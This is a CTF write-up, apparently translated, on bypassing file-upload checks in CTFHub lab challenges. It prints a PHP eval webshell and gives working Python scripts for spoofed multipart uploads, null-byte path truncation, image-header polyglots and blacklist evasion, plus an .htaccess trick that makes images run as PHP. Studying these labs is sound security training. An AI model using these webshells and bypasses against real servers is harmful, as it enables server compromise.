<> CTFHub skill tree, web: file upload section

A file upload vulnerability means that an attacker uploads an executable file to the server and then runs it. The uploaded file can be a trojan, a virus, a malicious script, a WebShell and so on. This is the most direct and effective kind of attack; the technical bar for some file upload vulnerabilities is very low, so they are easy for an attacker to exploit.

<> No validation

Because the uploaded file is not checked at all here, we upload a php file directly.

First write a one-sentence trojan.

A one-sentence trojan uses $_GET[' '], $_POST[' '] or $_COOKIE[' '] to receive the data we send, passes the received data to the function that executes code, and the command is then executed. The one used on this page is <?php @eval($_POST['hack']) ?>, with hack as the parameter name.

Upload the file to the server with the browser.

From the address in the response we can assemble the storage address of the shell.

Open AntSword and connect to the destination address.

Go through the back-end directories one by one, and then you can find the flag. Done.

<> Front-end verification

Before the file is uploaded, front-end JS code checks the file suffix once.

Only a file that meets the requirement can be uploaded, so here we just change the file suffix.

Write the one-sentence trojan into passwd.php and change the suffix to png/jpg so the front end lets it through.

Open the web page and upload the file in the browser.

Bring up Burp and intercept the request. Find passwd.png and change it to 1.php.

The upload succeeds, and here we can see where our image shell is stored.

Copy the URL into AntSword and fill in the password.

In the URL field, fill in the storage address of the shell.

The password is just the variable name in the trojan.

Add the filled-in entry, then look at file management.

You can see the shell under /upload.

And then we find the flag in the /html directory.

<> MIME restriction

When a file is uploaded, the server tries to block malicious files by checking the type of the selected file.

It is the same thing as before.

Upload and intercept the request.

Change Content-Type to image/jpeg.

Connect with AntSword.

Find the flag in the back-end directories.

Looking at the back-end source code, in the if statement we can see that only the file type (the Content-Type the browser declares) is restricted.

So we can also use the same method as for the JS bypass: first rename the file to jpg so the browser sends it as image/jpeg, then change the suffix back to php in the request.

That way the declared file type also meets the requirement.
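The two edits made in Burp above (renaming passwd.png to 1.php in the request for the front-end check, and declaring the part as image/jpeg for the MIME check) are both just fields in the multipart body. The following script, added here as an example and not part of the writeup or the challenge, builds that body so the filename and Content-Type can be set independently of the bytes uploaded. The form field name "file", the target host and port, and the upload path are assumptions.

```python
# Added example (not the challenge's code or the writeup's): build the
# multipart/form-data body that Burp is used to edit by hand, so filename and
# Content-Type are set independently of the bytes actually uploaded. The form
# field name "file", the target host/port and the upload path are assumptions.
import http.client
import os

# The one-sentence PHP trojan used on this page; the POST parameter name
# ("hack") is the password entered in AntSword.
WEBSHELL = b"<?php @eval($_POST['hack']); ?>"


def build_multipart(filename, content_type, data, field="file", boundary=None):
    """Return (body, Content-Type header value) for a single-file upload.

    filename and content_type are written into the part header verbatim; they
    are exactly what gets edited in Burp for the front-end and MIME bypasses.
    """
    if boundary is None:
        boundary = "----WebKitFormBoundary" + os.urandom(8).hex()
    b = boundary.encode()
    part = b'Content-Disposition: form-data; name="%s"; filename="%s"' % (
        field.encode(), filename.encode("latin-1"))
    lines = [b"--" + b, part, b"Content-Type: " + content_type.encode(),
             b"", data, b"--" + b + b"--", b""]
    return b"\r\n".join(lines), "multipart/form-data; boundary=" + boundary


def frontend_bypass(payload=WEBSHELL):
    """JS only sees the suffix chosen in the file dialog (passwd.png); the
    filename in the request is rewritten to 1.php after that check has run."""
    return build_multipart("1.php", "application/octet-stream", payload)


def mime_bypass(payload=WEBSHELL):
    """The server trusts the declared part type: keep the .php name and
    declare the part as image/jpeg, as when editing Content-Type in Burp."""
    return build_multipart("1.php", "image/jpeg", payload)


def send_upload(host, port, path, body, ctype):
    """POST the crafted body to the target (needs a live host, not run here)."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request("POST", path, body=body,
                 headers={"Content-Type": ctype, "Content-Length": str(len(body))})
    resp = conn.getresponse()
    return resp.status, resp.read().decode(errors="replace")


if __name__ == "__main__":
    body, ctype = mime_bypass()
    print(ctype)
    print(body.decode("latin-1"))
    # status, html = send_upload("127.0.0.1", 8080, "/", body, ctype)  # assumed target
```

The browser derives the part's Content-Type from the local file's suffix, which is why renaming to .jpg before choosing the file makes the MIME check pass without any Burp edit to that header; only the filename then has to be changed back. A server-side check that trusts either field is checking attacker-controlled data.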

<> 00 truncation

0x00 is the terminator of a C string. An attacker can insert this terminator by hand to cut off everything that follows it, and what follows it is what gets past the check.

<> Conditions for 00 truncation

PHP < 5.3.4 (from 5.3.4 on, PHP rejects file paths that contain a null byte) and magic_quotes_gpc off (with it on, the %00 is escaped and no longer truncates).
This one took me a long time, mainly because on my side the upload always showed as successful,

but I could not connect to it, and I kept thinking it was the environment.

The reason was found later.

On the page you can see /?road= in the URL; road is the path where the file is stored.

If you do not truncate this path and only truncate the file name, the system still stores the incoming file under road as usual.

The upload succeeds, but the file name is rewritten by the server, and the suffix is replaced according to your Content-Type.

So truncating the file name is not enough: the truncation has to be in road, or you will never find the shell you uploaded.

For the 00 truncation, either a raw 0x00 byte or %00 works, since %00 is decoded by the server to 0x00.

One more thing to note: the name of your shell is given by road and has nothing to do with your file name.
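To make the point about road concrete, the following script (added here as an example; it is an assumed reconstruction, not the challenge's real source) emulates the save-path logic the writeup observed: the server discards the client's filename, picks a random name, takes the extension from the declared Content-Type, and stores the result under the directory given by road. It then shows what a C-level file API sees once a NUL sits in that path. The directory /var/www/html/upload and the parameter handling are assumptions.

```python
# Added example (an assumed reconstruction, not the challenge's real source):
# why the NUL has to go into the ?road= parameter rather than only into the
# uploaded file name. server_save_path() follows what the writeup observed:
# the server picks its own random name, takes the extension from the declared
# Content-Type, and stores the file under the road directory.
import secrets
from urllib.parse import unquote

EXT_FROM_MIME = {"image/jpeg": "jpg", "image/png": "png", "image/gif": "gif"}


def c_string(path):
    """What a C file API (open/fopen) sees: the bytes up to the first NUL.
    Before PHP 5.3.4 PHP handed such paths straight to libc."""
    nul = path.find("\x00")
    return path if nul < 0 else path[:nul]


def server_save_path(road, filename, content_type, random_name=None):
    """Destination path the (assumed) vulnerable handler builds, as the string
    PHP holds and as the string libc actually opens. The client's filename is
    thrown away, so a NUL in it changes nothing."""
    del filename  # ignored by the server, per the writeup
    if random_name is None:
        random_name = secrets.token_hex(4)
    ext = EXT_FROM_MIME.get(content_type, "jpg")
    in_php = f"{road}/{random_name}.{ext}"
    return in_php, c_string(in_php)


def road_payload(wanted="/var/www/html/upload/1.php"):
    """Value for ?road=, URL-encoded: the shell path you want, then %00.
    A raw 0x00 byte in the request works just as well (assumed target dir)."""
    return wanted + "%00"


def decode_query_value(raw):
    """Server-side URL decoding of the query parameter: what $_GET contains
    with magic_quotes_gpc off (with it on, the NUL would be escaped)."""
    return unquote(raw)


if __name__ == "__main__":
    # Truncating only the file name: the server never uses it.
    print(server_save_path("/var/www/html/upload", "1.php\x00.jpg", "image/jpeg"))
    # Truncating road: PHP builds a longer path, libc stops at the NUL.
    road = decode_query_value(road_payload())
    print(server_save_path(road, "whatever.jpg", "image/jpeg"))
```

The second print shows the mismatch the writeup ran into: PHP thinks it wrote .../1.php\x00/<random>.jpg, so any path it echoes back is wrong, while the file actually created on disk is .../1.php. That is why the shell's name comes from road and why the upload looks successful yet nothing connects if the NUL was put in the wrong place.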

<> File header check

File header check: when the browser uploads a file, the server looks at the header (the first bytes) of the uploaded file. If the header belongs to a type on the whitelist, the upload goes through normally; otherwise it fails.

Let's change the header of the one-sentence trojan from before.

Open winhex and change the file header. As for exactly what to change (I'm lazy and don't want to memorise it): open a real image with the same suffix in winhex, copy its first line, and paste that first line in front of your one-sentence trojan.

Then as usual: upload, intercept and modify the request, and get the flag with AntSword.
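What the winhex step produces is an image signature followed by PHP code. The script below, added here as an example (not the writeup's own code), builds that polyglot for a few formats and emulates the kind of magic-byte whitelist check it defeats; header_type() is an assumption about what the challenge does, not its source.

```python
# Added example (not the writeup's own code): put a real image signature in
# front of the PHP one-sentence trojan so a server-side header (magic-byte)
# check sees an image, while PHP still runs the <?php ... ?> block after it.
# header_type() is an assumed reconstruction of such a check.

# Leading bytes of common image formats: the "first line" copied from a real
# picture in winhex.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF89a",
    "jpg": b"\xff\xd8\xff",
}

WEBSHELL = b"<?php @eval($_POST['hack']); ?>"


def header_type(data):
    """Emulated whitelist check: classify the upload by its first bytes and
    return None (reject) when no known signature matches."""
    for kind, sig in MAGIC.items():
        if data.startswith(sig):
            return kind
    return None


def make_polyglot(kind, payload=WEBSHELL):
    """Image signature, a newline, then the PHP payload. Everything outside
    <?php ... ?> is echoed verbatim by PHP, which is why the header shows up
    in the browser while the code itself does not."""
    return MAGIC[kind] + b"\n" + payload


def write_shell(path, kind="gif"):
    """Write the polyglot to disk (e.g. as 2.png for the .htaccess section)."""
    data = make_polyglot(kind)
    with open(path, "wb") as fh:
        fh.write(data)
    return data


if __name__ == "__main__":
    for k in MAGIC:
        print(k, header_type(make_polyglot(k)), len(make_polyglot(k)), "bytes")
    print(header_type(WEBSHELL))
```

GIF89a is the convenient choice because the signature is plain ASCII and survives any text editor. The bypass only works against checks that look at the leading bytes; a server that re-encodes the upload with an image library writes out a fresh image and the trailing PHP is gone, which is the fix a practitioner should reach for.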

<> Double suffix

Just upload and intercept the request again.

The upload succeeded? Why? What happened to my suffix?

Since it ate one of my suffixes, I'll write two.

Hey, that works, and then AntSword gets the flag.

Actually what this challenge does is filter out the strings on a blacklist: php gets removed. Since it only filters, we just build a payload that is still usable after the filtering.
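The filter described above removes a blacklisted string from the name in a single pass, so a name can be built that turns into the forbidden one only after the filter has run. The script below is added here as an example (not the challenge's source): the blacklist and the single-pass behaviour, modelled on PHP's non-recursive str_ireplace, are assumptions, and it puts a hardened variant next to the weak one.

```python
# Added example (not the challenge's source): a blacklist filter that strips
# each forbidden string from the file name in one pass, the way PHP's
# non-recursive str_ireplace does, next to the name that survives it and a
# hardened version. The exact blacklist and filter are assumptions.
import re

BLACKLIST = ["php", "phtml", "php3", "php5", "phar"]  # assumed


def weak_filter(name):
    """One pass per token: every occurrence is removed, but the characters on
    either side of a removed token are glued together and never re-checked."""
    for bad in BLACKLIST:
        name = re.sub(re.escape(bad), "", name, flags=re.IGNORECASE)
    return name


def survives_once(token):
    """Name fragment that turns back into token after token is cut out once:
    the first character, the token itself, then the rest ("pphphp" for php)."""
    return token[0] + token + token[1:]


def strict_filter(name):
    """Hardened: repeat the stripping until the name stops changing, then
    accept only a whitelisted final extension instead of trusting a blacklist."""
    while True:
        stripped = weak_filter(name)
        if stripped == name:
            break
        name = stripped
    ext = name.rsplit(".", 1)[1].lower() if "." in name else ""
    return name if ext in {"jpg", "jpeg", "png", "gif"} else None


if __name__ == "__main__":
    for n in ["1.php", "1." + survives_once("php"), "2.png"]:
        print(f"{n!r:16} weak -> {weak_filter(n)!r:10} strict -> {strict_filter(n)!r}")
```

Looping until the name is stable closes the gluing trick, but the real fix is the whitelist at the end: deciding what the server will serve from the final extension (and, better, renaming the file to a server-chosen name) rather than trying to enumerate every bad string.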

<> .htaccess

.htaccess is a configuration file of the Apache server that configures how the directory it sits in is served. Through .htaccess you can do 301 redirects, custom 404 pages, change how file extensions are handled, allow or block access for specific users or directories, disable directory listing, configure the default document, and so on.

First write a txt file, then rename it to .htaccess.

The content is as follows:

What it means: files whose name contains 2 are parsed as PHP.

So the 2.png we upload will be executed as PHP.
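The listing of the .htaccess did not come through above. The fragment below is added here as an example of the standard form that does what the text describes (any filename containing 2 is handed to the PHP handler); it is assumed to match the author's file in effect, not byte for byte, and the handler name is the one used by mod_php.

```apache
# Added example: have Apache run every file whose name contains "2" through
# the PHP handler. application/x-httpd-php is the mod_php handler name; a
# php-fpm setup would use a SetHandler pointing at the FastCGI proxy instead.
<FilesMatch "2">
    SetHandler application/x-httpd-php
</FilesMatch>
```

Apache only honours an uploaded .htaccess when the directory is configured with AllowOverride; setting AllowOverride None for the upload directory, and serving uploads from a location where no script handler is enabled at all, removes this whole class of bypass.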

Upload our .htaccess first, then upload 2.png.

Visit 2.png first. You can see the code at the front, which is the header copied earlier, while the <?php @eval($_POST['hack']) ?> is not displayed; this proves that the PHP was parsed.

Connect with AntSword and get the flag.
